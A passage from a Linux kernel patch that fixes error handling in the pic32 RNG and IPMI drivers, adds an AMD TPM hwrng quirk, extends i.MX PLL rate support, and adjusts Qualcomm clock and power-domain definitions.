++		return PTR_ERR(clk);
+ 
+ 	/* enable TRNG in enhanced mode */
+ 	v = TRNGEN | TRNGMOD;
+@@ -98,15 +94,11 @@ static int pic32_rng_probe(struct platform_device *pdev)
+ 
+ 	ret = devm_hwrng_register(&pdev->dev, &priv->rng);
+ 	if (ret)
+-		goto err_register;
++		return ret;
+ 
+ 	platform_set_drvdata(pdev, priv);
+ 
+ 	return 0;
+-
+-err_register:
+-	clk_disable_unprepare(priv->clk);
+-	return ret;
+ }
+ 
+ static int pic32_rng_remove(struct platform_device *pdev)
+@@ -114,7 +106,6 @@ static int pic32_rng_remove(struct platform_device *pdev)
+ 	struct pic32_rng *rng = platform_get_drvdata(pdev);
+ 
+ 	writel(0, rng->base + RNGCON);
+-	clk_disable_unprepare(rng->clk);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/char/ipmi/ipmi_si_intf.c b/drivers/char/ipmi/ipmi_si_intf.c
+index abddd7e43a9a6..5cd031f3fc970 100644
+--- a/drivers/char/ipmi/ipmi_si_intf.c
++++ b/drivers/char/ipmi/ipmi_si_intf.c
+@@ -2082,6 +2082,11 @@ static int try_smi_init(struct smi_info *new_smi)
+ 		new_smi->io.io_cleanup = NULL;
+ 	}
+ 
++	if (rv && new_smi->si_sm) {
++		kfree(new_smi->si_sm);
++		new_smi->si_sm = NULL;
++	}
++
+ 	return rv;
+ }
+ 
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index d48061ec27dd9..248459f97c67b 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -1403,7 +1403,7 @@ static struct ssif_addr_info *ssif_info_find(unsigned short addr,
+ restart:
+ 	list_for_each_entry(info, &ssif_infos, link) {
+ 		if (info->binfo.addr == addr) {
+-			if (info->addr_src == SI_SMBIOS)
++			if (info->addr_src == SI_SMBIOS && !info->adapter_name)
+ 				info->adapter_name = kstrdup(adapter_name,
+ 							     GFP_KERNEL);
+ 
+@@ -1603,6 +1603,11 @@ static int ssif_add_infos(struct i2c_client *client)
+ 	info->addr_src = SI_ACPI;
+ 	info->client = client;
+ 	info->adapter_name = kstrdup(client->adapter->name, GFP_KERNEL);
++	if (!info->adapter_name) {
++		kfree(info);
++		return -ENOMEM;
++	}
++
+ 	info->binfo.addr = client->addr;
+ 	list_add_tail(&info->link, &ssif_infos);
+ 	return 0;
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 7f7f3bded4535..db0b774207d35 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -463,28 +463,6 @@ static bool crb_req_canceled(struct tpm_chip *chip, u8 status)
+ 	return (cancel & CRB_CANCEL_INVOKE) == CRB_CANCEL_INVOKE;
+ }
+ 
+-static int crb_check_flags(struct tpm_chip *chip)
+-{
+-	u32 val;
+-	int ret;
+-
+-	ret = crb_request_locality(chip, 0);
+-	if (ret)
+-		return ret;
+-
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val, NULL);
+-	if (ret)
+-		goto release;
+-
+-	if (val == 0x414D4400U /* AMD */)
+-		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
+-
+-release:
+-	crb_relinquish_locality(chip, 0);
+-
+-	return ret;
+-}
+-
+ static const struct tpm_class_ops tpm_crb = {
+ 	.flags = TPM_OPS_AUTO_STARTUP,
+ 	.status = crb_status,
+@@ -826,9 +804,14 @@ static int crb_acpi_add(struct acpi_device *device)
+ 	if (rc)
+ 		goto out;
+ 
+-	rc = crb_check_flags(chip);
+-	if (rc)
+-		goto out;
++#ifdef CONFIG_X86
++	/* A quirk for https://www.amd.com/en/support/kb/faq/pa-410 */
++	if (boot_cpu_data.x86_vendor == X86_VENDOR_AMD &&
++	    priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		dev_info(dev, "Disabling hwrng\n");
++		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
++	}
++#endif /* CONFIG_X86 */
+ 
+ 	rc = tpm_chip_register(chip);
+ 
+diff --git a/drivers/clk/Kconfig b/drivers/clk/Kconfig
+index 5da82f2bdd211..a5dcc7293a836 100644
+--- a/drivers/clk/Kconfig
++++ b/drivers/clk/Kconfig
+@@ -427,6 +427,7 @@ config COMMON_CLK_BD718XX
+ config COMMON_CLK_FIXED_MMIO
+ 	bool "Clock driver for Memory Mapped Fixed values"
+ 	depends on COMMON_CLK && OF
++	depends on HAS_IOMEM
+ 	help
+ 	  Support for Memory Mapped IO Fixed clocks
+ 
+diff --git a/drivers/clk/imx/clk-composite-8m.c b/drivers/clk/imx/clk-composite-8m.c
+index cbf0d7955a00a..3e9a092e136c1 100644
+--- a/drivers/clk/imx/clk-composite-8m.c
++++ b/drivers/clk/imx/clk-composite-8m.c
+@@ -97,7 +97,7 @@ static int imx8m_clk_composite_divider_set_rate(struct clk_hw *hw,
+ 	int prediv_value;
+ 	int div_value;
+ 	int ret;
+-	u32 val;
++	u32 orig, val;
+ 
+ 	ret = imx8m_clk_composite_compute_dividers(rate, parent_rate,
+ 						&prediv_value, &div_value);
+@@ -106,13 +106,15 @@ static int imx8m_clk_composite_divider_set_rate(struct clk_hw *hw,
+ 
+ 	spin_lock_irqsave(divider->lock, flags);
+ 
+-	val = readl(divider->reg);
+-	val &= ~((clk_div_mask(divider->width) << divider->shift) |
+-			(clk_div_mask(PCG_DIV_WIDTH) << PCG_DIV_SHIFT));
++	orig = readl(divider->reg);
++	val = orig & ~((clk_div_mask(divider->width) << divider->shift) |
++		       (clk_div_mask(PCG_DIV_WIDTH) << PCG_DIV_SHIFT));
+ 
+ 	val |= (u32)(prediv_value  - 1) << divider->shift;
+ 	val |= (u32)(div_value - 1) << PCG_DIV_SHIFT;
+-	writel(val, divider->reg);
++
++	if (val != orig)
++		writel(val, divider->reg);
+ 
+ 	spin_unlock_irqrestore(divider->lock, flags);
+ 
+diff --git a/drivers/clk/imx/clk-imx8mp.c b/drivers/clk/imx/clk-imx8mp.c
+index 05c02f4e2a143..3d0d8f2c02dc1 100644
+--- a/drivers/clk/imx/clk-imx8mp.c
++++ b/drivers/clk/imx/clk-imx8mp.c
+@@ -177,10 +177,6 @@ static const char * const imx8mp_sai3_sels[] = {"osc_24m", "audio_pll1_out", "au
+ 						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
+ 						"clk_ext3", "clk_ext4", };
+ 
+-static const char * const imx8mp_sai4_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
+-						"clk_ext1", "clk_ext2", };
+-
+ static const char * const imx8mp_sai5_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+ 						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
+ 						"clk_ext2", "clk_ext3", };
+@@ -566,7 +562,6 @@ static int imx8mp_clocks_probe(struct platform_device *pdev)
+ 	hws[IMX8MP_CLK_SAI1] = imx8m_clk_hw_composite("sai1", imx8mp_sai1_sels, ccm_base + 0xa580);
+ 	hws[IMX8MP_CLK_SAI2] = imx8m_clk_hw_composite("sai2", imx8mp_sai2_sels, ccm_base + 0xa600);
+ 	hws[IMX8MP_CLK_SAI3] = imx8m_clk_hw_composite("sai3", imx8mp_sai3_sels, ccm_base + 0xa680);
+-	hws[IMX8MP_CLK_SAI4] = imx8m_clk_hw_composite("sai4", imx8mp_sai4_sels, ccm_base + 0xa700);
+ 	hws[IMX8MP_CLK_SAI5] = imx8m_clk_hw_composite("sai5", imx8mp_sai5_sels, ccm_base + 0xa780);
+ 	hws[IMX8MP_CLK_SAI6] = imx8m_clk_hw_composite("sai6", imx8mp_sai6_sels, ccm_base + 0xa800);
+ 	hws[IMX8MP_CLK_ENET_QOS] = imx8m_clk_hw_composite("enet_qos", imx8mp_enet_qos_sels, ccm_base + 0xa880);
+diff --git a/drivers/clk/imx/clk-imx8ulp.c b/drivers/clk/imx/clk-imx8ulp.c
+index ca0e4a3aa454e..fa9121b3cf36a 100644
+--- a/drivers/clk/imx/clk-imx8ulp.c
++++ b/drivers/clk/imx/clk-imx8ulp.c
+@@ -167,7 +167,7 @@ static int imx8ulp_clk_cgc1_init(struct platform_device *pdev)
+ 	clks[IMX8ULP_CLK_SPLL2_PRE_SEL]	= imx_clk_hw_mux_flags("spll2_pre_sel", base + 0x510, 0, 1, pll_pre_sels, ARRAY_SIZE(pll_pre_sels), CLK_SET_PARENT_GATE);
+ 	clks[IMX8ULP_CLK_SPLL3_PRE_SEL]	= imx_clk_hw_mux_flags("spll3_pre_sel", base + 0x610, 0, 1, pll_pre_sels, ARRAY_SIZE(pll_pre_sels), CLK_SET_PARENT_GATE);
+ 
+-	clks[IMX8ULP_CLK_SPLL2] = imx_clk_hw_pllv4(IMX_PLLV4_IMX8ULP, "spll2", "spll2_pre_sel", base + 0x500);
++	clks[IMX8ULP_CLK_SPLL2] = imx_clk_hw_pllv4(IMX_PLLV4_IMX8ULP_1GHZ, "spll2", "spll2_pre_sel", base + 0x500);
+ 	clks[IMX8ULP_CLK_SPLL3] = imx_clk_hw_pllv4(IMX_PLLV4_IMX8ULP, "spll3", "spll3_pre_sel", base + 0x600);
+ 	clks[IMX8ULP_CLK_SPLL3_VCODIV] = imx_clk_hw_divider("spll3_vcodiv", "spll3", base + 0x604, 0, 6);
+ 
+diff --git a/drivers/clk/imx/clk-pllv4.c b/drivers/clk/imx/clk-pllv4.c
+index 6e7e34571fc8d..9b136c951762c 100644
+--- a/drivers/clk/imx/clk-pllv4.c
++++ b/drivers/clk/imx/clk-pllv4.c
+@@ -44,11 +44,15 @@ struct clk_pllv4 {
+ 	u32		cfg_offset;
+ 	u32		num_offset;
+ 	u32		denom_offset;
++	bool		use_mult_range;
+ };
+ 
+ /* Valid PLL MULT Table */
+ static const int pllv4_mult_table[] = {33, 27, 22, 20, 17, 16};
+ 
++/* Valid PLL MULT range, (max, min) */
++static const int pllv4_mult_range[] = {54, 27};
++
+ #define to_clk_pllv4(__hw) container_of(__hw, struct clk_pllv4, hw)
+ 
+ #define LOCK_TIMEOUT_US		USEC_PER_MSEC
+@@ -94,17 +98,30 @@ static unsigned long clk_pllv4_recalc_rate(struct clk_hw *hw,
+ static long clk_pllv4_round_rate(struct clk_hw *hw, unsigned long rate,
+ 				 unsigned long *prate)
+ {
++	struct clk_pllv4 *pll = to_clk_pllv4(hw);
+ 	unsigned long parent_rate = *prate;
+ 	unsigned long round_rate, i;
+ 	u32 mfn, mfd = DEFAULT_MFD;
+ 	bool found = false;
+ 	u64 temp64;
+-
+-	for (i = 0; i < ARRAY_SIZE(pllv4_mult_table); i++) {
+-		round_rate = parent_rate * pllv4_mult_table[i];
+-		if (rate >= round_rate) {
++	u32 mult;
++
++	if (pll->use_mult_range) {
++		temp64 = (u64)rate;
++		do_div(temp64, parent_rate);
++		mult = temp64;
++		if (mult >= pllv4_mult_range[1] &&
++		    mult <= pllv4_mult_range[0]) {
++			round_rate = parent_rate * mult;
+ 			found = true;
+-			break;
++		}
++	} else {
++		for (i = 0; i < ARRAY_SIZE(pllv4_mult_table); i++) {
++			round_rate = parent_rate * pllv4_mult_table[i];
++			if (rate >= round_rate) {
++				found = true;
++				break;
++			}
+ 		}
+ 	}
+ 
+@@ -138,14 +155,20 @@ static long clk_pllv4_round_rate(struct clk_hw *hw, unsigned long rate,
+ 	return round_rate + (u32)temp64;
+ }
+ 
+-static bool clk_pllv4_is_valid_mult(unsigned int mult)
++static bool clk_pllv4_is_valid_mult(struct clk_pllv4 *pll, unsigned int mult)
+ {
+ 	int i;
+ 
+ 	/* check if mult is in valid MULT table */
+-	for (i = 0; i < ARRAY_SIZE(pllv4_mult_table); i++) {
+-		if (pllv4_mult_table[i] == mult)
++	if (pll->use_mult_range) {
++		if (mult >= pllv4_mult_range[1] &&
++		    mult <= pllv4_mult_range[0])
+ 			return true;
++	} else {
++		for (i = 0; i < ARRAY_SIZE(pllv4_mult_table); i++) {
++			if (pllv4_mult_table[i] == mult)
++				return true;
++		}
+ 	}
+ 
+ 	return false;
+@@ -160,7 +183,7 @@ static int clk_pllv4_set_rate(struct clk_hw *hw, unsigned long rate,
+ 
+ 	mult = rate / parent_rate;
+ 
+-	if (!clk_pllv4_is_valid_mult(mult))
++	if (!clk_pllv4_is_valid_mult(pll, mult))
+ 		return -EINVAL;
+ 
+ 	if (parent_rate <= MAX_MFD)
+@@ -227,10 +250,13 @@ struct clk_hw *imx_clk_hw_pllv4(enum imx_pllv4_type type, const char *name,
+ 
+ 	pll->base = base;
+ 
+-	if (type == IMX_PLLV4_IMX8ULP) {
++	if (type == IMX_PLLV4_IMX8ULP ||
++	    type == IMX_PLLV4_IMX8ULP_1GHZ) {
+ 		pll->cfg_offset = IMX8ULP_PLL_CFG_OFFSET;
+ 		pll->num_offset = IMX8ULP_PLL_NUM_OFFSET;
+ 		pll->denom_offset = IMX8ULP_PLL_DENOM_OFFSET;
++		if (type == IMX_PLLV4_IMX8ULP_1GHZ)
++			pll->use_mult_range = true;
+ 	} else {
+ 		pll->cfg_offset = PLL_CFG_OFFSET;
+ 		pll->num_offset = PLL_NUM_OFFSET;
+diff --git a/drivers/clk/imx/clk.h b/drivers/clk/imx/clk.h
+index dd49f90110e8b..fb59131395f03 100644
+--- a/drivers/clk/imx/clk.h
++++ b/drivers/clk/imx/clk.h
+@@ -46,6 +46,7 @@ enum imx_pll14xx_type {
+ enum imx_pllv4_type {
+ 	IMX_PLLV4_IMX7ULP,
+ 	IMX_PLLV4_IMX8ULP,
++	IMX_PLLV4_IMX8ULP_1GHZ,
+ };
+ 
+ enum imx_pfdv2_type {
+diff --git a/drivers/clk/keystone/pll.c b/drivers/clk/keystone/pll.c
+index d59a7621bb204..ee5c72369334f 100644
+--- a/drivers/clk/keystone/pll.c
++++ b/drivers/clk/keystone/pll.c
+@@ -209,7 +209,7 @@ static void __init _of_pll_clk_init(struct device_node *node, bool pllctrl)
+ 	}
+ 
+ 	clk = clk_register_pll(NULL, node->name, parent_name, pll_data);
+-	if (clk) {
++	if (!IS_ERR_OR_NULL(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ 		return;
+ 	}
+diff --git a/drivers/clk/qcom/gcc-sc7180.c b/drivers/clk/qcom/gcc-sc7180.c
+index 2d3980251e78e..5822db4f4f358 100644
+--- a/drivers/clk/qcom/gcc-sc7180.c
++++ b/drivers/clk/qcom/gcc-sc7180.c
+@@ -667,6 +667,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parent_data_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_5),
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+diff --git a/drivers/clk/qcom/gcc-sc8280xp.c b/drivers/clk/qcom/gcc-sc8280xp.c
+index b3198784e1c3d..57bbd609151cd 100644
+--- a/drivers/clk/qcom/gcc-sc8280xp.c
++++ b/drivers/clk/qcom/gcc-sc8280xp.c
+@@ -6760,7 +6760,7 @@ static struct gdsc pcie_0_tunnel_gdsc = {
+ 		.name = "pcie_0_tunnel_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE,
++	.flags = VOTABLE | RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc pcie_1_tunnel_gdsc = {
+@@ -6771,7 +6771,7 @@ static struct gdsc pcie_1_tunnel_gdsc = {
+ 		.name = "pcie_1_tunnel_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE,
++	.flags = VOTABLE | RETAIN_FF_ENABLE,
+ };
+ 
+ /*
+@@ -6786,7 +6786,7 @@ static struct gdsc pcie_2a_gdsc = {
+ 		.name = "pcie_2a_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc pcie_2b_gdsc = {
+@@ -6797,7 +6797,7 @@ static struct gdsc pcie_2b_gdsc = {
+ 		.name = "pcie_2b_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc pcie_3a_gdsc = {
+@@ -6808,7 +6808,7 @@ static struct gdsc pcie_3a_gdsc = {
+ 		.name = "pcie_3a_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc pcie_3b_gdsc = {
+@@ -6819,7 +6819,7 @@ static struct gdsc pcie_3b_gdsc = {
+ 		.name = "pcie_3b_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc pcie_4_gdsc = {
+@@ -6830,7 +6830,7 @@ static struct gdsc pcie_4_gdsc = {
+ 		.name = "pcie_4_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc ufs_card_gdsc = {
+@@ -6839,6 +6839,7 @@ static struct gdsc ufs_card_gdsc = {
+ 		.name = "ufs_card_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc ufs_phy_gdsc = {
+@@ -6847,6 +6848,7 @@ static struct gdsc ufs_phy_gdsc = {
+ 		.name = "ufs_phy_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc usb30_mp_gdsc = {
+@@ -6855,6 +6857,7 @@ static struct gdsc usb30_mp_gdsc = {
+ 		.name = "usb30_mp_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_RET_ON,
++	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc usb30_prim_gdsc = {
+@@ -6863,6 +6866,7 @@ static struct gdsc usb30_prim_gdsc = {
+ 		.name = "usb30_prim_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_RET_ON,
++	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc usb30_sec_gdsc = {
+@@ -6871,6 +6875,115 @@ static struct gdsc usb30_sec_gdsc = {
+ 		.name = "usb30_sec_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_RET_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc emac_0_gdsc = {
++	.gdscr = 0xaa004,
++	.pd = {
++		.name = "emac_0_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc emac_1_gdsc = {
++	.gdscr = 0xba004,
++	.pd = {
++		.name = "emac_1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc usb4_1_gdsc = {
++	.gdscr = 0xb8004,
++	.pd = {
++		.name = "usb4_1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc usb4_gdsc = {
++	.gdscr = 0x2a004,
++	.pd = {
++		.name = "usb4_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc hlos1_vote_mmnoc_mmu_tbu_hf0_gdsc = {
++	.gdscr = 0x7d050,
++	.pd = {
++		.name = "hlos1_vote_mmnoc_mmu_tbu_hf0_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_mmnoc_mmu_tbu_hf1_gdsc = {
++	.gdscr = 0x7d058,
++	.pd = {
++		.name = "hlos1_vote_mmnoc_mmu_tbu_hf1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_mmnoc_mmu_tbu_sf0_gdsc = {
++	.gdscr = 0x7d054,
++	.pd = {
++		.name = "hlos1_vote_mmnoc_mmu_tbu_sf0_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_mmnoc_mmu_tbu_sf1_gdsc = {
++	.gdscr = 0x7d06c,
++	.pd = {
++		.name = "hlos1_vote_mmnoc_mmu_tbu_sf1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_turing_mmu_tbu0_gdsc = {
++	.gdscr = 0x7d05c,
++	.pd = {
++		.name = "hlos1_vote_turing_mmu_tbu0_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_turing_mmu_tbu1_gdsc = {
++	.gdscr = 0x7d060,
++	.pd = {
++		.name = "hlos1_vote_turing_mmu_tbu1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_turing_mmu_tbu2_gdsc = {
++	.gdscr = 0x7d0a0,
++	.pd = {
++		.name = "hlos1_vote_turing_mmu_tbu2_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_turing_mmu_tbu3_gdsc = {
++	.gdscr = 0x7d0a4,
++	.pd = {
++		.name = "hlos1_vote_turing_mmu_tbu3_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
+ };
+ 
+ static struct clk_regmap *gcc_sc8280xp_clocks[] = {
+@@ -7351,6 +7464,18 @@ static struct gdsc *gcc_sc8280xp_gdscs[] = {
+ 	[USB30_MP_GDSC] = &usb30_mp_gdsc,
+ 	[USB30_PRIM_GDSC] = &usb30_prim_gdsc,
+ 	[USB30_SEC_GDSC] = &usb30_sec_gdsc,
++	[EMAC_0_GDSC] = &emac_0_gdsc,
++	[EMAC_1_GDSC] = &emac_1_gdsc,
++	[USB4_1_GDSC] = &usb4_1_gdsc,
++	[USB4_GDSC] = &usb4_gdsc,
++	[HLOS1_VOTE_MMNOC_MMU_TBU_HF0_GDSC] = &hlos1_vote_mmnoc_mmu_tbu_hf0_gdsc,
++	[HLOS1_VOTE_MMNOC_MMU_TBU_HF1_GDSC] = &hlos1_vote_mmnoc_mmu_tbu_hf1_gdsc,
++	[HLOS1_VOTE_MMNOC_MMU_TBU_SF0_GDSC] = &hlos1_vote_mmnoc_mmu_tbu_sf0_gdsc,
++	[HLOS1_VOTE_MMNOC_MMU_TBU_SF1_GDSC] = &hlos1_vote_mmnoc_mmu_tbu_sf1_gdsc,
++	[HLOS1_VOTE_TURING_MMU_TBU0_GDSC] = &hlos1_vote_turing_mmu_tbu0_gdsc,
++	[HLOS1_VOTE_TURING_MMU_TBU1_GDSC] = &hlos1_vote_turing_mmu_tbu1_gdsc,
++	[HLOS1_VOTE_TURING_MMU_TBU2_GDSC] = &hlos1_vote_turing_mmu_tbu2_gdsc,
++	[HLOS1_VOTE_TURING_MMU_TBU3_GDSC] = &hlos1_vote_turing_mmu_tbu3_gdsc,
+ };
+ 
+ static const struct clk_rcg_dfs_data gcc_dfs_clocks[] = {
+diff --git a/drivers/clk/qcom/gcc-sm6350.c b/drivers/clk/qcom/gcc-sm6350.c
+index 9b4e4bb059635..cf4a7b6e0b23a 100644
+--- a/drivers/clk/qcom/gcc-sm6350.c
++++ b/drivers/clk/qcom/gcc-sm6350.c
+@@ -641,6 +641,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parent_data_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_8),
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+diff --git a/drivers/clk/qcom/gcc-sm8250.c b/drivers/clk/qcom/gcc-sm8250.c
+index a0ba37656b07b..30bd561461074 100644
+--- a/drivers/clk/qcom/gcc-sm8250.c
++++ b/drivers/clk/qcom/gcc-sm8250.c
+@@ -721,6 +721,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parent_data_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_4),
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+diff --git a/drivers/clk/qcom/gcc-sm8450.c b/drivers/clk/qcom/gcc-sm8450.c
+index 666efa5ff9780..59c567e76d656 100644
+--- a/drivers/clk/qcom/gcc-sm8450.c
++++ b/drivers/clk/qcom/gcc-sm8450.c
+@@ -904,7 +904,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.parent_data = gcc_parent_data_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_7),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+ 
+@@ -926,7 +926,7 @@ static struct clk_rcg2 gcc_sdcc4_apps_clk_src = {
+ 		.parent_data = gcc_parent_data_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_0),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gpucc-sm6350.c b/drivers/clk/qcom/gpucc-sm6350.c
+index ef15185a99c31..0bcbba2a29436 100644
+--- a/drivers/clk/qcom/gpucc-sm6350.c
++++ b/drivers/clk/qcom/gpucc-sm6350.c
+@@ -24,6 +24,12 @@
+ #define CX_GMU_CBCR_WAKE_MASK		0xF
+ #define CX_GMU_CBCR_WAKE_SHIFT		8
+ 
++enum {
++	DT_BI_TCXO,
++	DT_GPLL0_OUT_MAIN,
++	DT_GPLL0_OUT_MAIN_DIV,
++};
++
+ enum {
+ 	P_BI_TCXO,
+ 	P_GPLL0_OUT_MAIN,
+@@ -61,6 +67,7 @@ static struct clk_alpha_pll gpu_cc_pll0 = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gpu_cc_pll0",
+ 			.parent_data =  &(const struct clk_parent_data){
++				.index = DT_BI_TCXO,
+ 				.fw_name = "bi_tcxo",
+ 			},
+ 			.num_parents = 1,
+@@ -104,6 +111,7 @@ static struct clk_alpha_pll gpu_cc_pll1 = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gpu_cc_pll1",
+ 			.parent_data =  &(const struct clk_parent_data){
++				.index = DT_BI_TCXO,
+ 				.fw_name = "bi_tcxo",
+ 			},
+ 			.num_parents = 1,
+@@ -121,11 +129,11 @@ static const struct parent_map gpu_cc_parent_map_0[] = {
+ };
+ 
+ static const struct clk_parent_data gpu_cc_parent_data_0[] = {
+-	{ .fw_name = "bi_tcxo" },
++	{ .index = DT_BI_TCXO, .fw_name = "bi_tcxo" },
+ 	{ .hw = &gpu_cc_pll0.clkr.hw },
+ 	{ .hw = &gpu_cc_pll1.clkr.hw },
+-	{ .fw_name = "gcc_gpu_gpll0_clk" },
+-	{ .fw_name = "gcc_gpu_gpll0_div_clk" },
++	{ .index = DT_GPLL0_OUT_MAIN, .fw_name = "gcc_gpu_gpll0_clk_src" },
++	{ .index = DT_GPLL0_OUT_MAIN_DIV, .fw_name = "gcc_gpu_gpll0_div_clk_src" },
+ };
+ 
+ static const struct parent_map gpu_cc_parent_map_1[] = {
+@@ -138,12 +146,12 @@ static const struct parent_map gpu_cc_parent_map_1[] = {
+ };
+ 
+ static const struct clk_parent_data gpu_cc_parent_data_1[] = {
+-	{ .fw_name = "bi_tcxo" },
++	{ .index = DT_BI_TCXO, .fw_name = "bi_tcxo" },
+ 	{ .hw = &crc_div.hw },
+ 	{ .hw = &gpu_cc_pll0.clkr.hw },
+ 	{ .hw = &gpu_cc_pll1.clkr.hw },
+ 	{ .hw = &gpu_cc_pll1.clkr.hw },
+-	{ .fw_name = "gcc_gpu_gpll0_clk" },
++	{ .index = DT_GPLL0_OUT_MAIN, .fw_name = "gcc_gpu_gpll0_clk_src" },
+ };
+ 
+ static const struct freq_tbl ftbl_gpu_cc_gmu_clk_src[] = {
+diff --git a/drivers/clk/qcom/reset.c b/drivers/clk/qcom/reset.c
+index 0e914ec7aeae1..e45e32804d2c7 100644
+--- a/drivers/clk/qcom/reset.c
++++ b/drivers/clk/qcom/reset.c
+@@ -16,7 +16,8 @@ static int qcom_reset(struct reset_controller_dev *rcdev, unsigned long id)
+ 	struct qcom_reset_controller *rst = to_qcom_reset_controller(rcdev);
+ 
+ 	rcdev->ops->assert(rcdev, id);
+-	udelay(rst->reset_map[id].udelay ?: 1); /* use 1 us as default */
